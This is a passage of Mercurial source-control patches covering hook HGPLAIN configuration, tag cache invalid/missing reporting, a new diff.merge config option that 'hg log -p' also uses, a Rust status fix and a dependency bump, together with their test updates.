for CommandError { fn from(error: ConfigError) -> Self { match error { - ConfigError::Parse(ConfigParseError { - origin, - line, - bytes, - }) => { - let line_message 
= if let Some(line_number) = line { - format_bytes!( - b" at line {}", - line_number.to_string().into_bytes() - ) - } else { - Vec::new() - }; - CommandError::Abort { - message: format_bytes!( - b"config parse error in {}{}: '{}'", - origin.to_bytes(), - line_message, - bytes - ), - } - } + ConfigError::Parse(error) => error.into(), ConfigError::Other(error) => error.into(), } } } +impl From<ConfigParseError> for CommandError { + fn from(error: ConfigParseError) -> Self { + let ConfigParseError { + origin, + line, + bytes, + } = error; + let line_message = if let Some(line_number) = line { + format_bytes!(b" at line {}", line_number.to_string().into_bytes()) + } else { + Vec::new() + }; + CommandError::Abort { + message: format_bytes!( + b"config parse error in {}{}: '{}'", + origin.to_bytes(), + line_message, + bytes + ), + } + } +} + impl From<(RevlogError, &str)> for CommandError { fn from((err, rev): (RevlogError, &str)) -> CommandError { match err { # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1613104606 28800 # Thu Feb 11 20:36:46 2021 -0800 # Node ID d67732a4b58a3f11e2d4f2e2aa85d759738a6dff # Parent d7685105e504d6d964b32adc7b11234841e5f54f # Parent b910be772eb9bc0b62bd3bc421a2084d3ac72c9f branching: merge with stable diff --git a/hgext/largefiles/overrides.py b/hgext/largefiles/overrides.py --- a/hgext/largefiles/overrides.py +++ b/hgext/largefiles/overrides.py @@ -1853,7 +1853,7 @@ @eh.wrapfunction(urlmod, b'open') -def openlargefile(orig, ui, url_, data=None): +def openlargefile(orig, ui, url_, data=None, **kwargs): if url_.startswith(_lfscheme): if data: msg = b"cannot use data on a 'largefile://' url" @@ -1861,4 +1861,4 @@ lfid = url_[len(_lfscheme) :] return storefactory.getlfile(ui, lfid) else: - return orig(ui, url_, data=data) + return orig(ui, url_, data=data, **kwargs) diff --git a/mercurial/cmdutil.py b/mercurial/cmdutil.py --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -3145,7 +3145,7 @@ # avoid 
reporting something like "committed new head" when # recommitting old changesets, and issue a helpful warning # for most instances - repo.ui.warn(_("warning: commit already existed in the repository!\n")) + repo.ui.warn(_(b"warning: commit already existed in the repository!\n")) elif ( not opts.get(b'amend') and bheads diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1333,11 +1333,17 @@ ) coreconfigitem( b'hooks', - b'.*', + b'[^:]*', default=dynamicdefault, generic=True, ) coreconfigitem( + b'hooks', + b'.*:run-with-plain', + default=True, + generic=True, +) +coreconfigitem( b'hgweb-paths', b'.*', default=list, diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1027,6 +1027,13 @@ incoming.autobuild = /my/build/hook # force autobuild hook to run before other incoming hooks priority.incoming.autobuild = 1 + ### control HGPLAIN setting when running autobuild hook + # HGPLAIN always set (default from Mercurial 5.7) + incoming.autobuild:run-with-plain = yes + # HGPLAIN never set + incoming.autobuild:run-with-plain = no + # HGPLAIN inherited from environment (default before Mercurial 5.7) + incoming.autobuild:run-with-plain = auto Most hooks are run with environment variables set that give useful additional information. 
For each hook below, the environment variables diff --git a/mercurial/hook.py b/mercurial/hook.py --- a/mercurial/hook.py +++ b/mercurial/hook.py @@ -157,7 +157,15 @@ env[b'HG_PENDING'] = repo.root env[b'HG_HOOKTYPE'] = htype env[b'HG_HOOKNAME'] = name - env[b'HGPLAIN'] = b'1' + + if ui.config(b'hooks', b'%s:run-with-plain' % name) == b'auto': + plain = ui.plain() + else: + plain = ui.configbool(b'hooks', b'%s:run-with-plain' % name) + if plain: + env[b'HGPLAIN'] = b'1' + else: + env[b'HGPLAIN'] = b'' for k, v in pycompat.iteritems(args): # transaction changes can accumulate MBs of data, so skip it @@ -224,7 +232,11 @@ """return all hooks items ready to be sorted""" hooks = {} for name, cmd in ui.configitems(b'hooks', untrusted=_untrusted): - if name.startswith(b'priority.') or name.startswith(b'tonative.'): + if ( + name.startswith(b'priority.') + or name.startswith(b'tonative.') + or b':' in name + ): continue priority = ui.configint(b'hooks', b'priority.%s' % name, 0) diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -60,8 +60,6 @@ # The config knobs that will be altered (if unset) by ui.tweakdefaults. tweakrc = b""" [ui] -# Gives detailed exit codes for input/user errors, config errors, etc. -detailed-exit-code = True # The rollback command is dangerous. As a rule, don't use it. rollback = False # Make `hg status` report copy information diff --git a/mercurial/utils/procutil.py b/mercurial/utils/procutil.py --- a/mercurial/utils/procutil.py +++ b/mercurial/utils/procutil.py @@ -546,7 +546,11 @@ # pure build; use a safe default return True else: - return pycompat.iswindows or encoding.environ.get(b"DISPLAY") + return ( + pycompat.iswindows + or encoding.environ.get(b"DISPLAY") + or encoding.environ.get(b"WAYLAND_DISPLAY") + ) def gui(): diff --git a/relnotes/5.7 b/relnotes/5.7 --- a/relnotes/5.7 +++ b/relnotes/5.7 @@ -19,9 +19,6 @@ * `hg purge` is now a core command using `--confirm` by default. 
- * `hg strip`, from the strip extension, is now a core command, `hg - debugstrip`. The extension remains for compatibility. - * `hg diff` and `hg extdiff` now support `--from <rev>` and `--to <rev>` arguments as clearer alternatives to `-r <revs>`. `-r <revs>` has been deprecated. diff --git a/rust/hg-core/src/dirstate/status.rs b/rust/hg-core/src/dirstate/status.rs --- a/rust/hg-core/src/dirstate/status.rs +++ b/rust/hg-core/src/dirstate/status.rs @@ -776,58 +776,66 @@ #[cfg(not(feature = "dirstate-tree"))] #[timed] pub fn extend_from_dmap(&self, results: &mut Vec<DispatchedPath<'a>>) { - results.par_extend(self.dmap.par_iter().map( - move |(filename, entry)| { - let filename: &HgPath = filename; - let filename_as_path = match hg_path_to_path_buf(filename) { - Ok(f) => f, - Err(_) => { - return ( + results.par_extend( + self.dmap + .par_iter() + .filter(|(path, _)| self.matcher.matches(path)) + .map(move |(filename, entry)| { + let filename: &HgPath = filename; + let filename_as_path = match hg_path_to_path_buf(filename) + { + Ok(f) => f, + Err(_) => { + return ( + Cow::Borrowed(filename), + INVALID_PATH_DISPATCH, + ) + } + }; + let meta = self + .root_dir + .join(filename_as_path) + .symlink_metadata(); + match meta { + Ok(m) + if !(m.file_type().is_file() + || m.file_type().is_symlink()) => + { + ( + Cow::Borrowed(filename), + dispatch_missing(entry.state), + ) + } + Ok(m) => ( Cow::Borrowed(filename), - INVALID_PATH_DISPATCH, - ) - } - }; - let meta = - self.root_dir.join(filename_as_path).symlink_metadata(); - match meta { - Ok(m) - if !(m.file_type().is_file() - || m.file_type().is_symlink()) => - { - ( - Cow::Borrowed(filename), - dispatch_missing(entry.state), - ) + dispatch_found( + filename, + *entry, + HgMetadata::from_metadata(m), + &self.dmap.copy_map, + self.options, + ), + ), + Err(e) + if e.kind() == ErrorKind::NotFound + || e.raw_os_error() == Some(20) => + { + // Rust does not yet have an `ErrorKind` for + // `NotADirectory` (errno 20) + // It 
happens if the dirstate contains `foo/bar` + // and foo is not a + // directory + ( + Cow::Borrowed(filename), + dispatch_missing(entry.state), + ) + } + Err(e) => { + (Cow::Borrowed(filename), dispatch_os_error(&e)) + } } - Ok(m) => ( - Cow::Borrowed(filename), - dispatch_found( - filename, - *entry, - HgMetadata::from_metadata(m), - &self.dmap.copy_map, - self.options, - ), - ), - Err(e) - if e.kind() == ErrorKind::NotFound - || e.raw_os_error() == Some(20) => - { - // Rust does not yet have an `ErrorKind` for - // `NotADirectory` (errno 20) - // It happens if the dirstate contains `foo/bar` - // and foo is not a - // directory - ( - Cow::Borrowed(filename), - dispatch_missing(entry.state), - ) - } - Err(e) => (Cow::Borrowed(filename), dispatch_os_error(&e)), - } - }, - )); + }), + ); } /// Checks all files that are in the dirstate but were not found during the diff --git a/tests/test-hgweb-diffs.t b/tests/test-hgweb-diffs.t --- a/tests/test-hgweb-diffs.t +++ b/tests/test-hgweb-diffs.t @@ -1138,6 +1138,21 @@ $ cd test1 $ hg import -q --bypass --exact http://localhost:$HGPORT/rev/1 +repeat test above, with largefiles enabled + + $ cd .. + $ rm -r test1 + $ hg clone -r0 test test1 + adding changesets + adding manifests + adding file changes + added 1 changesets with 2 changes to 2 files + new changesets 0cd96de13884 + updating to branch default + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ cd test1 + $ hg import --config extensions.largefiles= -q --bypass --exact http://localhost:$HGPORT/rev/1 + raw revision with diff block numbers $ killdaemons.py diff --git a/tests/test-hook.t b/tests/test-hook.t --- a/tests/test-hook.t +++ b/tests/test-hook.t @@ -1390,3 +1390,42 @@ date: Thu Jan 01 00:00:00 1970 +0000 summary: a + +unsetup the test +---------------- + +# touch the file to unconfuse chg with a diffrent mtime + $ sleep 1 + $ touch $TESTTMP/untrusted.py + $ cat << EOF >> $HGRCPATH + > [extensions] + > untrusted=! 
+ > EOF + +HGPLAIN setting in hooks +======================== + + $ cat << EOF >> .hg/hgrc + > [hooks] + > pre-version.testing-default=echo '### default ###' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-yes=echo '### yes #######' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-yes:run-with-plain=yes + > pre-version.testing-no=echo '### no ########' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-no:run-with-plain=no + > pre-version.testing-auto=echo '### auto ######' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-auto:run-with-plain=auto + > EOF + + $ (unset HGPLAIN; hg version --quiet) + ### default ### plain: 1 + ### yes ####### plain: 1 + ### no ######## plain: <unset> + ### auto ###### plain: <unset> + Mercurial Distributed SCM (*) (glob) + + $ HGPLAIN=1 hg version --quiet + ### default ### plain: 1 + ### yes ####### plain: 1 + ### no ######## plain: <unset> + ### auto ###### plain: 1 + Mercurial Distributed SCM (*) (glob) diff --git a/tests/test-status.t b/tests/test-status.t --- a/tests/test-status.t +++ b/tests/test-status.t @@ -680,3 +680,14 @@ $ cd symlink-repo0 $ ln -s ../repo0/.hg $ hg status + +Check using include flag with pattern when status does not need to traverse +the working directory (issue6483) + + $ cd .. + $ hg init issue6483 + $ cd issue6483 + $ touch a.py b.rs + $ hg add a.py b.rs + $ hg st -aI "*.py" + A a.py # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1608826883 18000 # Thu Dec 24 11:21:23 2020 -0500 # Node ID 5aac1a1a5bebf3dc9cae86d1f50dc019a7481f7f # Parent d67732a4b58a3f11e2d4f2e2aa85d759738a6dff tagcache: distinguish between invalid and missing entries The TortoiseHg repo has typically not had a newly applied tag accessible by name for recent releases, for unknown reasons. Deleting and rebuilding the tag cache doesn't fix it, though deleting the cache and running `hg log -r $new_tag` does. Eventually the situation does sort itself out for new clones from the server. 
In an effort to figure out what the issue is, Pierre-Yves David suggested listing these entries in the debug output more specifically. This isn't complete yet- the second test change that says "missing" is more like "invalid", since it was truncated. The problem there is the code that reads the raw array truncates any partial records and then fills it with 0xFF, which signifies that it is missing. As a side note, that means the check for the length when validating an existing entry never fails. Differential Revision: https://phab.mercurial-scm.org/D9811 diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -1769,7 +1769,7 @@ for node in outgoing.ancestorsof: # Don't compute missing, as this may slow down serving. fnode = cache.getfnode(node, computemissing=False) - if fnode is not None: + if fnode: chunks.extend([node, fnode]) if chunks: diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -3868,7 +3868,13 @@ for r in repo: node = repo[r].node() tagsnode = cache.getfnode(node, computemissing=False) - tagsnodedisplay = hex(tagsnode) if tagsnode else b'missing/invalid' + if tagsnode: + tagsnodedisplay = hex(tagsnode) + elif tagsnode is False: + tagsnodedisplay = b'invalid' + else: + tagsnodedisplay = b'missing' + ui.write(b'%d %s %s\n' % (r, hex(node), tagsnodedisplay)) diff --git a/mercurial/tags.py b/mercurial/tags.py --- a/mercurial/tags.py +++ b/mercurial/tags.py @@ -733,6 +733,7 @@ if rawlen < wantedlen: if self._dirtyoffset is None: self._dirtyoffset = rawlen + # TODO: zero fill entire record, because it's invalid not missing? self._raw.extend(b'\xff' * (wantedlen - rawlen)) def getfnode(self, node, computemissing=True): @@ -740,7 +741,8 @@ If the value is in the cache, the entry will be validated and returned. 
Otherwise, the filenode will be computed and returned unless - "computemissing" is False, in which case None will be returned without + "computemissing" is False. In that case, None will be returned if + the entry is missing or False if the entry is invalid without any potentially expensive computation being performed. If an .hgtags does not exist at the specified revision, nullid is @@ -771,6 +773,8 @@ # If we get here, the entry is either missing or invalid. if not computemissing: + if record != _fnodesmissingrec: + return False return None fnode = None @@ -788,7 +792,7 @@ # we cannot rely on readfast because we don't know against what # parent the readfast delta is computed p1fnode = None - if p1fnode is not None: + if p1fnode: mctx = ctx.manifestctx() fnode = mctx.readfast().get(b'.hgtags') if fnode is None: diff --git a/tests/test-tags.t b/tests/test-tags.t --- a/tests/test-tags.t +++ b/tests/test-tags.t @@ -104,7 +104,7 @@ 0010: ff ff ff ff ff ff ff ff b9 15 46 36 26 b7 b4 a7 |..........F6&...| 0020: 73 e0 9e e3 c5 2f 51 0e 19 e0 5e 1f f9 66 d8 59 |s..../Q...^..f.Y| $ hg debugtagscache - 0 acb14030fe0a21b60322c440ad2d20cf7685a376 missing/invalid + 0 acb14030fe0a21b60322c440ad2d20cf7685a376 missing 1 b9154636be938d3d431e75a7c906504a079bfe07 26b7b4a773e09ee3c52f510e19e05e1ff966d859 Repeat with cold tag cache: @@ -381,7 +381,7 @@ $ hg debugtagscache | tail -2 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d - 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 missing/invalid + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 missing $ hg tags tip 5:8dbfe60eff30 bar 1:78391a272241 @@ -389,6 +389,34 @@ 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8af31de17fab7422878ee5a2dadbc943d +If the 4 bytes of node hash for a record don't match an existing node, the entry +is flagged as invalid. 
+ + >>> import os + >>> with open(".hg/cache/hgtagsfnodes1", "rb+") as fp: + ... fp.seek(-24, os.SEEK_END) and None + ... fp.write(b'\xde\xad') and None + + $ f --size --hexdump .hg/cache/hgtagsfnodes1 + .hg/cache/hgtagsfnodes1: size=144 + 0000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| + 0010: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| + 0020: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| + 0030: 7a 94 12 77 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |z..w.....1....B(| + 0040: 78 ee 5a 2d ad bc 94 3d 6f a4 50 21 7d 3b 71 8c |x.Z-...=o.P!};q.| + 0050: 96 4e f3 7b 89 e5 50 eb da fd 57 89 e7 6c e1 b0 |.N.{..P...W..l..| + 0060: 0c 19 2d 7d 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |..-}.....1....B(| + 0070: 78 ee 5a 2d ad bc 94 3d de ad e6 0e 0c 04 f2 a8 |x.Z-...=........| + 0080: af 31 de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |.1....B(x.Z-...=| + + $ hg debugtagscache | tail -2 + 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 invalid + + $ hg tags + tip 5:8dbfe60eff30 + bar 1:78391a272241 + #if unix-permissions no-root Errors writing to .hgtags fnodes cache are silently ignored @@ -405,7 +433,7 @@ $ hg blackbox -l 6 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> couldn't write cache/hgtagsfnodes1: [Errno *] * (glob) - 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 3/4 cache hits/lookups in * seconds (glob) + 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 2/4 cache hits/lookups in * seconds (glob) 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing .hg/cache/tags2-visible with 1 tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags exited 0 after * seconds (glob) 1970/01/01 00:00:00 bob 
@b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> blackbox -l 6 @@ -420,7 +448,7 @@ $ hg blackbox -l 6 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing 24 bytes to cache/hgtagsfnodes1 - 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 3/4 cache hits/lookups in * seconds (glob) + 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 2/4 cache hits/lookups in * seconds (glob) 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing .hg/cache/tags2-visible with 1 tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags exited 0 after * seconds (glob) 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> blackbox -l 6 # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612472751 28800 # Thu Feb 04 13:05:51 2021 -0800 # Node ID d57e607d9e3359d3471763e92f29e32f001e2465 # Parent 5aac1a1a5bebf3dc9cae86d1f50dc019a7481f7f diff: replace --merge option by config option I can't think of any reason you'd want to enable the merge diff on a run-to-run basis; you'd probably either always or never want it set (though I can't see why you'd never want it set). If you have it set, you'll probably also want the same output in `hg log -p` output. Having a single config option for the feature makes sense. 
Differential Revision: https://phab.mercurial-scm.org/D9956 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -2465,16 +2465,6 @@ (b'', b'from', b'', _(b'revision to diff from'), _(b'REV1')), (b'', b'to', b'', _(b'revision to diff to'), _(b'REV2')), (b'c', b'change', b'', _(b'change made by revision'), _(b'REV')), - ( - b'', - b'merge', - False, - _( - b'show difference between auto-merge and committed ' - b'merge for merge commits (EXPERIMENTAL)' - ), - _(b'REV'), - ), ] + diffopts + diffopts2 @@ -2555,7 +2545,7 @@ to_rev = opts.get(b'to') stat = opts.get(b'stat') reverse = opts.get(b'reverse') - diffmerge = opts.get(b'merge') + diffmerge = ui.configbool(b'diff', b'merge') cmdutil.check_incompatible_arguments(opts, b'from', [b'rev', b'change']) cmdutil.check_incompatible_arguments(opts, b'to', [b'rev', b'change']) diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -754,6 +754,12 @@ ) _registerdiffopts(section=b'diff') coreconfigitem( + b'diff', + b'merge', + default=False, + experimental=True, +) +coreconfigitem( b'email', b'bcc', default=None, diff --git a/mercurial/filemerge.py b/mercurial/filemerge.py --- a/mercurial/filemerge.py +++ b/mercurial/filemerge.py @@ -546,7 +546,7 @@ def _imerge3alwaysgood(*args, **kwargs): # Like merge3, but record conflicts as resolved with markers in place. # - # This is used for `hg diff --merge` to show the differences between + # This is used for `diff.merge` to show the differences between # the auto-merge state and the committed merge state. It may be # useful for other things. 
b1, junk, b2 = _imerge3(*args, **kwargs) diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -8,10 +8,10 @@ == New Experimental Features == - * `hg diff` now takes an experimental `--merge` flag which causes `hg - diff --change` to show the changes relative to an automerge for - merge changesets. This makes it easier to detect and review manual - changes performed in merge changesets. + * There's a new `diff.merge` config option to show the changes + relative to an automerge for merge changesets. This makes it + easier to detect and review manual changes performed in merge + changesets. It is only supported by `hg diff --change` so far. == Bug Fixes == diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -336,7 +336,7 @@ debugwhyunstable: debugwireargs: three, four, five, ssh, remotecmd, insecure debugwireproto: localssh, peer, noreadstderr, nologhandshake, ssh, remotecmd, insecure - diff: rev, from, to, change, merge, text, git, binary, nodates, noprefix, show-function, reverse, ignore-all-space, ignore-space-change, ignore-blank-lines, ignore-space-at-eol, unified, stat, root, include, exclude, subrepos + diff: rev, from, to, change, text, git, binary, nodates, noprefix, show-function, reverse, ignore-all-space, ignore-space-change, ignore-blank-lines, ignore-space-at-eol, unified, stat, root, include, exclude, subrepos export: bookmark, output, switch-parent, rev, text, git, binary, nodates, template files: rev, print0, include, exclude, template, subrepos forget: interactive, include, exclude, dry-run diff --git a/tests/test-diff-change.t b/tests/test-diff-change.t --- a/tests/test-diff-change.t +++ b/tests/test-diff-change.t @@ -196,7 +196,7 @@ merge diff should show only manual edits to a merge: - $ hg diff --merge -c 6 + $ hg diff --config diff.merge=yes -c 6 (no diff output is expected here) Construct an "evil merge" that does something other than just 
the merge. @@ -226,7 +226,7 @@ Contrast with the `hg diff -c 7` version above: only the manual edit shows up, making it easy to identify changes someone is otherwise trying to sneak into a merge. - $ hg diff --merge -c 7 + $ hg diff --config diff.merge=yes -c 7 diff -r 8ad85e839ba7 file.txt --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 @@ -266,15 +266,15 @@ $ hg resolve -ma (no more unresolved files) $ hg commit -m 'merge conflicted edit' -Without --merge, it's a diff against p1 - $ hg diff --no-merge -c 11 +Without diff.merge, it's a diff against p1 + $ hg diff --config diff.merge=no -c 11 diff -r fd1f17c90d7c -r 5010caab09f6 new-file-p2.txt --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/new-file-p2.txt Thu Jan 01 00:00:00 1970 +0000 @@ -0,0 +1,1 @@ +this file is new in p2 of the merge -With --merge, it's a diff against the conflicted content. - $ hg diff --merge -c 11 +With diff.merge, it's a diff against the conflicted content. + $ hg diff --config diff.merge=yes -c 11 diff -r 5010caab09f6 file.txt --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612473661 28800 # Thu Feb 04 13:21:01 2021 -0800 # Node ID 4a012e53106656e327e696aabf0a97ff70bd13ab # Parent d57e607d9e3359d3471763e92f29e32f001e2465 diff: extract function for getting possibly re-merged parent to diff against We'll want to reuse the logic that `hg diff --change` with `diff.merge` uses. At least `hg log -p` should reuse it. This patch therefore extracts that code to a function. 
Differential Revision: https://phab.mercurial-scm.org/D9957 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -29,7 +29,6 @@ bundlecaches, changegroup, cmdutil, - context as contextmod, copies, debugcommands as debugcommandsmod, destutil, @@ -2545,33 +2544,13 @@ to_rev = opts.get(b'to') stat = opts.get(b'stat') reverse = opts.get(b'reverse') - diffmerge = ui.configbool(b'diff', b'merge') cmdutil.check_incompatible_arguments(opts, b'from', [b'rev', b'change']) cmdutil.check_incompatible_arguments(opts, b'to', [b'rev', b'change']) if change: repo = scmutil.unhidehashlikerevs(repo, [change], b'nowarn') ctx2 = scmutil.revsingle(repo, change, None) - if diffmerge and ctx2.p2().node() != nullid: - pctx1 = ctx2.p1() - pctx2 = ctx2.p2() - wctx = contextmod.overlayworkingctx(repo) - wctx.setbase(pctx1) - with ui.configoverride( - { - ( - b'ui', - b'forcemerge', - ): b'internal:merge3-lie-about-conflicts', - }, - b'diff --merge', - ): - repo.ui.pushbuffer() - mergemod.merge(pctx2, wc=wctx) - repo.ui.popbuffer() - ctx1 = wctx - else: - ctx1 = ctx2.p1() + ctx1 = logcmdutil.diff_parent(ctx2) elif from_rev or to_rev: repo = scmutil.unhidehashlikerevs( repo, [from_rev] + [to_rev], b'nowarn' diff --git a/mercurial/logcmdutil.py b/mercurial/logcmdutil.py --- a/mercurial/logcmdutil.py +++ b/mercurial/logcmdutil.py @@ -27,6 +27,7 @@ graphmod, match as matchmod, mdiff, + merge, patch, pathutil, pycompat, @@ -73,6 +74,36 @@ return limit +def diff_parent(ctx): + """get the context object to use as parent when diffing + + + If diff.merge is enabled, an overlayworkingctx of the auto-merged parents will be returned. + """ + repo = ctx.repo() + if repo.ui.configbool(b"diff", b"merge") and ctx.p2().node() != nullid: + # avoid cycle context -> subrepo -> cmdutil -> logcmdutil + from . 
import context + + wctx = context.overlayworkingctx(repo) + wctx.setbase(ctx.p1()) + with repo.ui.configoverride( + { + ( + b"ui", + b"forcemerge", + ): b"internal:merge3-lie-about-conflicts", + }, + b"merge-diff", + ): + repo.ui.pushbuffer() + merge.merge(ctx.p2(), wc=wctx) + repo.ui.popbuffer() + return wctx + else: + return ctx.p1() + + def diffordiffstat( ui, repo, # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612474331 28800 # Thu Feb 04 13:32:11 2021 -0800 # Node ID 3caa3698335edebeb5b423eb896e298e01b9abdb # Parent 4a012e53106656e327e696aabf0a97ff70bd13ab log: respect diff.merge in -p output Differential Revision: https://phab.mercurial-scm.org/D9958 diff --git a/mercurial/logcmdutil.py b/mercurial/logcmdutil.py --- a/mercurial/logcmdutil.py +++ b/mercurial/logcmdutil.py @@ -247,7 +247,7 @@ ui, ctx.repo(), diffopts, - ctx.p1(), + diff_parent(ctx), ctx, match=self._makefilematcher(ctx), stat=stat, diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -11,7 +11,8 @@ * There's a new `diff.merge` config option to show the changes relative to an automerge for merge changesets. This makes it easier to detect and review manual changes performed in merge - changesets. It is only supported by `hg diff --change` so far. + changesets. It is supported by `hg diff --change`, `hg log -p` + `hg incoming -p`, and `hg outgoing -p` so far. 
== Bug Fixes == diff --git a/tests/test-log.t b/tests/test-log.t --- a/tests/test-log.t +++ b/tests/test-log.t @@ -1966,6 +1966,26 @@ @@ -0,0 +1,1 @@ +b + +Test that diff.merge is respected (file b was added on one side and +and therefore merged cleanly) + + $ hg log -pr 3 --config diff.merge=yes + changeset: 3:8e07aafe1edc + tag: tip + parent: 2:b09be438c43a + parent: 1:925d80f479bb + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: 3 + + diff -r 8e07aafe1edc a + --- a/a Thu Jan 01 00:00:00 1970 +0000 + +++ b/a Thu Jan 01 00:00:00 1970 +0000 + @@ -1,1 +1,1 @@ + -b + +c + $ cd .. 'hg log -r rev fn' when last(filelog(fn)) != rev # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612779236 -3600 # Mon Feb 08 11:13:56 2021 +0100 # Node ID eace48b4a78655502a91bcf7d6f3bdeb50fd8d6e # Parent 3caa3698335edebeb5b423eb896e298e01b9abdb rust: Use the DisplayBytes trait in config printing This is similar to `std::fmt::Display`, but for arbitrary bytes instead of Unicode. Writing to an abstract output stream helps avoid allocating intermediate `Vec<u8>` buffers. 
Differential Revision: https://phab.mercurial-scm.org/D9966 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -244,16 +244,16 @@ [[package]] name = "format-bytes" -version = "0.1.3" +version = "0.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" dependencies = [ - "format-bytes-macros 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)", + "format-bytes-macros 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)", "proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)", ] [[package]] name = "format-bytes-macros" -version = "0.1.2" +version = "0.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" dependencies = [ "proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)", @@ -305,7 +305,7 @@ "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", "derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)", - "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", + "format-bytes 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)", "home 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)", "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)", "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", @@ -718,7 +718,7 @@ "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", "derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)", - "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", + "format-bytes 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)", "hg-core 0.1.0", "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", "micro-timer 0.3.1 
